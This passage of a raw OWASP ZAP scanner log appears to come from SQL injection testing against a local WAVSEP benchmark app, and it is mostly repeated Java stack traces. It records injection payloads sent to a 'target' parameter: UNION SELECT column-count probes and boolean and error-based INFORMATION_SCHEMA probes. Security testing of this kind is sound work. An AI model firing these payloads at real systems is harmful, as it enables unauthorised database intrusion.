java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682596 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682597 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682598 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682599 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682600 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682601 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682601 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682602 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682602 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9682613 [ZAP-ActiveScanner-1] ERROR org.parosproxy.paros.network.HttpMethodHelper - unsupported protocol: '172.17.0.2' java.lang.IllegalStateException: unsupported protocol: '172.17.0.2' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.parosproxy.paros.network.HttpMethodHelper.createRequestMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9682613 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Error occurred while scanning a message: java.lang.IllegalArgumentException: host parameter is null at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:206) at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:155) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionWithReference.(MultiThreadedHttpConnectionManager.java:1145) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$ConnectionPool.createConnection(MultiThreadedHttpConnectionManager.java:762) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.doGetConnection(MultiThreadedHttpConnectionManager.java:476) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.getConnectionWithTimeout(MultiThreadedHttpConnectionManager.java:416) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9683139 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9683270 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (8127=1720) THEN 8127 ELSE 8127*(SELECT 8127 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9683273 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (1906=1906) THEN 1906 ELSE 1906*(SELECT 1906 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9683280 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (8127=1720) THEN 8127 ELSE 8127*(SELECT 8127 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9683355 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 8247 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(8247=8247,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9683357 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(4009=4009,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at 